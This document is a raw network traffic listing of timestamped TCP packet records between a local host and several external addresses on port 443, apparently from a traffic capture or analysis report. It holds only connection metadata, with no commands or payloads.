                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.879072905 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.892365932 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.892443895 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.892484903 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.892492056 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.893182993 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.900387049 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.900990963 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.908677101 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.908813000 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.909173012 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.909185886 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.909504890 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.917141914 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.925122023 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.925261021 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.925268888 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.931056976 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.931200981 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.931207895 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.937659979 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.937870979 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.937876940 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.943541050 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.943710089 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.943717003 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.949717045 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.953051090 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.953051090 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.099225044 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.099296093 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.099798918 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.100089073 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.100106001 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.113768101 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.113811016 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.113898039 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.114077091 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.114090919 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.140774965 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.140950918 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.141024113 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.141041040 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.141110897 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.141208887 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.141215086 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.142908096 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.143003941 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.143009901 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.151427984 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.151582003 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.151587963 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.158243895 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.158312082 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.158318043 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.204885960 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.228821039 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.260155916 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.266916037 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.266937971 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.282902002 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.314930916 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.314944029 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.335659027 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.335735083 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.335741043 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.341732025 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.341792107 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.341797113 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349164009 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349293947 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349301100 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349741936 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349757910 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349777937 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349786043 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349809885 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349812984 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349841118 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349858046 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349879026 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.349893093 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.356534958 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.356591940 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.356597900 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.363993883 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.364098072 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.364124060 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.371756077 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.371826887 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.371834040 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.386352062 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.386424065 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.386429071 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.393562078 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.393666029 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.393672943 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.401000023 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.401067972 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.401073933 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.407978058 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.408082008 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.408090115 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.415163994 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.415225983 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.415266991 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.422359943 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.422401905 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.422430992 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.422450066 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.422561884 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.422636032 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.422874928 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.422898054 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.460748911 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.460764885 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.460797071 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.460832119 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.460833073 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.460854053 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.460895061 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.460917950 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.613742113 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.613770962 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.613827944 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.613843918 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.613887072 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.643454075 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.643472910 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.643541098 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.643548965 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.643596888 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.668591022 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.668606997 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.668700933 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.668715954 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.668804884 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.681224108 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.681303024 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.681310892 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.681430101 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.681602001 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.681618929 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.681634903 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.681684971 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.776923895 CET49673443192.168.2.18204.79.197.203
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.317784071 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.318104982 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.318120956 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.319150925 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.319216967 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.319519997 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.319581032 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.319685936 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.319691896 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.339840889 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.340150118 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.340173960 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.341186047 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.341253042 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.341656923 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.341723919 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.341830015 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.341837883 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.367891073 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.383892059 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.767875910 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.768481970 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.768516064 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.768546104 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.768559933 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.768618107 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.769273043 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.769774914 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.769870996 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.769877911 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.782970905 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.783015966 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.783024073 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.787686110 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.788353920 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.788384914 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.788422108 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.788444042 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.788490057 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.789113998 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.791309118 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.791363001 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.791368961 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.796147108 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.796365023 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.796423912 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.796433926 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.796631098 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.804657936 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.812665939 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.812757969 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.812772989 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.820679903 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.820719004 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.820969105 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.821257114 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.821265936 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.846870899 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.862915039 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.887814045 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.941874981 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.959486961 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.964868069 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.964929104 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.964941025 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.972846985 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.972898960 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.972904921 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.979767084 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.980633974 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.980695009 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.980700016 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.985204935 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.985261917 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.985290051 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.988641977 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.988697052 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.988703012 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.993340969 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.993494034 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.993506908 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.996671915 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.996762037 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:03.996767998 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.001554012 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.001780987 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.001802921 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.004795074 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.005347013 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.005363941 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.009577036 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.009607077 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.009644032 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.009668112 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.009774923 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.009776115 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.009867907 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.010076046 CET44349794104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.010142088 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.010327101 CET49794443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.012274027 CET49798443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.012322903 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.012417078 CET49798443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.012476921 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.012617111 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.012631893 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.012661934 CET49798443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.012679100 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.020561934 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.020728111 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.020740986 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.034910917 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.035105944 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.035120964 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.041465044 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.041640043 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.041654110 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.048260927 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.048352003 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.048365116 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.056080103 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.056235075 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.056248903 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.056269884 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.056493044 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.056763887 CET49793443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:04.056783915 CET44349793104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.032016039 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.032345057 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.032362938 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.033418894 CET44349797104.18.95.41192.168.2.18
